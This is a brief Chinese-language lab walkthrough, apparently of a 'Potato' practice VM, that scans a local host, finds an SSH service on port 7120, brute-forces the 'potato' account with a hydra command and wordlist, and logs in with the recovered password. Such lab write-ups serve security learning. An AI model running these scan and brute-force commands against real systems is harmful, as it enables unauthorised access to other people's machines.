arp-scan -l 扫描IP
使用御剑端口扫描扫描端口,扫到了80和7120两个端口,其中7120为ssh端口
使用dirb http://192.168.171.134 扫描目录
发现info.php 访问为phpinfo界面
访问192.168.171.134为一个大土豆,没什么用
所以我们从ssh入手
盲猜账号为potato 我们使用九头蛇hydra(或图形化xhydra)来进行爆破密码
命令行为:
hydra -l potato -P /usr/share/wordlists/nmap.lst ssh://192.168.171.134:7120
我们就得到了账号为potato,密码为letmein
这样我们就知道了ssh的账号密码,直接连接就可以获得shell了
ssh -p 7120 potato@192.168.171.134
